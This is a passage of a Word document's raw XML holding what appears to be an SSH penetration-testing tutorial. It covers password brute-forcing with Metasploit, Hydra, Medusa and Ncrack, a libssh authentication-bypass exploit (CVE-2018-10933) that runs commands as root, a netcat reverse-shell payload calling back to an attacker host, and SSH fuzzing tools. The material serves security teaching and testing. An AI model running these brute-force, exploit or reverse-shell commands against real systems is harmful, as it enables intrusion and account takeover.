          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C14E4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lastRenderedPageBreak/>
        <w:t>Read the help messages given below if you don’t understand an argument/option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4354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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDF0C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With </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B4E1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msf5 &gt; search ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FF15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7EF9A14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Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC9CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E034CC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5FA51D0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Name                                                        Disclosure Date  Rank       Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C583C62"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                                                        ---------------  ----       -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011727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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78600FA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17  auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846234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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C46D4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&gt; use 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA11AC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auxiliary(scanner/ssh/ssh_login) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C2F6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0303AC22"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Module options (auxiliary/scanner/ssh/ssh_login):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF57C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7F07A62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Name              Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DA80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  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4764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BLANK_PASSWORDS   false            no        Try blank passwords for all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B4CA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BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99677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DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23C35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DB_ALL_PASS       false            no        Add all passwords in the current database to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609721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DB_ALL_USERS      false            no        Add all users in the current database to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369B60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PASSWORD                           no        A specific password to authenticate with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797887F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PASS_FILE                          no        File containing passwords, one per line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20064BF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 xml:space="preserve">   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CB57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RPORT             22               yes       The target port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA90A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STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC9BF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THREADS           1                yes       The number of concurrent threads (max one per host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB7C37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USERNAME                           no        A specific username to authenticate as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1C42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USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F00E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USER_AS_PASS      false            no        Try the username as the password for all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB29DF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USER_FILE                          no        File containing usernames, one per line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35631D3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VERBOSE           false            yes       Whether to print output for all attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663C26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2C26E9C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auxiliary(scanner/ssh/ssh_login) &gt; set PASS_FILE /usr/share/wordlists/password/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4304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PASS_FILE =&gt; /usr/share/wordlists/password/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C95E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auxiliary(scanner/ssh/ssh_login) &gt; set RHOSTS 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF28F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RHOSTS =&gt; 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC35D1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auxiliary(scanner/ssh/ssh_login) &gt; set THREADS 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7925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THREADS =&gt; 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1558D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auxiliary(scanner/ssh/ssh_login) &gt; set STOP_ON_SUCCESS true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEE08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STOP_ON_SUCCESS =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F8E83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auxiliary(scanner/ssh/ssh_login) &gt; set username noraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF0ACE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username =&gt; noraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2581C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auxiliary(scanner/ssh/ssh_login) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF10FD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06FA068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192.168.1.94:22 - Success: 'noraj:noraj' ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D809F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Command shell session 1 opened (192.168.1.83:37291 -&gt; 192.168.1.94:22) at 2020-01-02 21:33:33 +0100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03C5D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 Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC992E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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215CB4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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923A24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With </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47156EE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hydra -l noraj -P /usr/share/wordlists/password/rockyou.txt -e s ssh://192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4DAB4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Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1991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3A49F0D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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-02 21:44:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8ABB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[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED055E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[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BA71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[DATA] attacking ssh://192.168.1.94:22/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C66EC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[22][ssh] host: 192.168.1.94   login: noraj   password: noraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294BC6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1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DB6A2"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Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-02 21:44:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24233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Extract of the help message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5166ED6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-l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFA4F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-p PASS  or -P FILE  try password PASS, or load several passwords from FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158C2A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-e nsr    try "n" null password, "s" login as pass and/or "r" reversed login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FF3D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service   the service to crack (see below for supported protocols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAAF01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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8E8B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With </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Medusa</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11955A6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medusa -h 192.168.1.94 -u noraj -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BAD12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Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks &lt;jmk@foofus.net&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7936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7ADF7B8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ACCOUNT CHECK: [ssh] Host: 192.168.1.94 (1 of 1, 0 complete) User: noraj (1 of 1, 0 complete) Password: noraj (1 of 14344391 complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9326C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ACCOUNT FOUND: [ssh] Host: 192.168.1.94 User: noraj Password: noraj [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A43DC2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Extract of the help message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086112D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-h [TEXT]    : Target hostname or IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D948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-u [TEXT]    : Username to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD8F77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-P [FILE]    : File containing passwords to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B191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-e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1ED82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-M [TEXT]    : Name of the module to execute (without the .mod extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09583F7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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Ncrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987A182"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With </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>ncrack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034BB39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 ncrack --user noraj -P /usr/share/wordlists/password/rockyou.txt ssh://192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34BC7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Starting Ncrack 0.7 ( http://ncrack.org ) at 2020-01-02 21:50 CET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FAFB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5475326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Discovered credentials for ssh on 192.168.1.94 22/tcp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B5AB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192.168.1.94 22/tcp ssh: 'noraj' 'noraj'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477416F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4BA1DE9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Ncrack done: 1 service scanned in 3.00 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE43C8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1DF3482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Ncrack finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19231D9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Extract of the help message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331F5A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-P &lt;filename&gt;: password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA9E76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--user &lt;username_list&gt;: comma-separated username list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37201FD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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Exploit – LibSSH RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672030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hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>CVE-2018-10933</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> is the reference for a vulnerability impacting libssh library. This vulnerability allows unauthorized access by bypassing the authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBC6F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 xml:space="preserve">libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>expect to initiate authentication, the attacker could successfully authentciate without any credentials. </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Advisory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="763BCE62"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7BDCB5"/>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When you find a vulnerable version with </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> you should see something like that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6986B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22/tcp  open     ssh      libssh 0.8.3 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61800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Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> (the tool used to locally browse the Exploit-DB) shows the existing exploits available for </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>libssh</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79884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searchsploit libssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CD4D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D406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Exploit Title                                                                              |  Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C673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(/usr/share/exploitdb/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1755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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960415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LibSSH 0.7.6 / 0.8.4 - Unauthorized Access                                                  | exploits/linux/remote/46307.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB73DD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libSSH - Authentication Bypass                                                              | exploits/linux/remote/45638.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBFA0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844D7A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Shellcodes: No Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412297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So we can use the exploit to execute a command on the target in order to confirm it is working.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8CA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python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B8EE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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6C17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Instead of just running a command we can try to execute a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F97A70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First we start the listener on our machine: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sudo ncat -nlp 80</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EF7A0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Then we use a sh reverse shell payload in the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392856B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python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.1.100 80 &gt;/tmp/f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92DEE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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D2D0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As fuzzing is complex, I’m only going to highlight two approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934ACAC" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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lastRenderedPageBreak/>
        <w:t>Generic &amp; automated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D1217E" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Specific &amp; manual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FEC4E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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Generic &amp; automated approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D49B7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It’s possible to use a script like </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>sshfuzz.pl </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>to automatically fuzz a live SSH server whatever is the implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E3F5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It has the advantage of being simple but it’s not very targeted so it’s going to take a lot of time and miss a lot of results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B19FA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Install dependencies and launch the script is as easy as writing those two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746FE52"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cpan Net::SSH2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997672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./sshfuzz.pl -H 192.168.1.94 -P 22 -u noraj -p noraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D3B6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Another automated approach that will also work on any live SSH server is to use the metasploit module </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>auxiliary/fuzzers/ssh/ssh_version_2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDB2E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&gt; use auxiliary/fuzzers/ssh/ssh_version_2</w:t>
      </w:r>
    </w:p>
